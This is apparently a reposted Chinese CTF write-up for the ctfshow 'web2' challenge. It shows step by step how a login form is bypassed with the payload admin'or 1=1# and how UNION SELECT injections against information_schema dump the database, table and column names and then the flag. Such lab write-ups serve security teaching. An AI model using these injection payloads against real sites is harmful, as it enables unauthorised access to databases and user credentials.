ctfshow web web2
2021/8/29 23:06:43
本文主要是介绍ctfshow web web2,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
打开容器,发现一个登陆框
输入admin 密码随便输入,用burp抓包,发送到Repeater模块
首先试试万能密码:’or 1=1# username=admin'or 1=1#&password=123 发现登陆成功
接着查看回显位置:username=admin'or 1=1 union select 1,2,3#&password=123
发现有回显
接着就爆库爆表爆数据
爆库:username=admin'or 1=1 union select 1,database(),3#&password=123
发现数据库位web2
爆表名爆表admin'or 1=1 union select 1,group_concat(table_name),3(1,2,3是回显位置,哪个位置有回显就在哪个地方写group...) from information_schema.tables where table_schema='查询到的数据库名'
成功爆出flag跟user
接着爆字段admin'or 1=1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='要查询的字段名'
发现flag字段
接下来就直接查找flag字段下面的数据
爆数据admin'or 1=1 union select 1,要爆的数据,3 from 爆出的字段名
成功拿到flag
这篇关于ctfshow web web2的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2025-01-09CMS内容管理系统是什么?如何选择适合你的平台?
- 2025-01-08CCPM如何缩短项目周期并降低风险?
- 2025-01-08Omnivore 替代品 Readeck 安装与使用教程
- 2025-01-07Cursor 收费太贵?3分钟教你接入超低价 DeepSeek-V3,代码质量逼近 Claude 3.5
- 2025-01-06PingCAP 连续两年入选 Gartner 云数据库管理系统魔力象限“荣誉提及”
- 2025-01-05Easysearch 可搜索快照功能,看这篇就够了
- 2025-01-04BOT+EPC模式在基础设施项目中的应用与优势
- 2025-01-03用LangChain构建会检索和搜索的智能聊天机器人指南
- 2025-01-03图像文字理解,OCR、大模型还是多模态模型?PalliGema2在QLoRA技术上的微调与应用
- 2025-01-03混合搜索:用LanceDB实现语义和关键词结合的搜索技术(应用于实际项目)
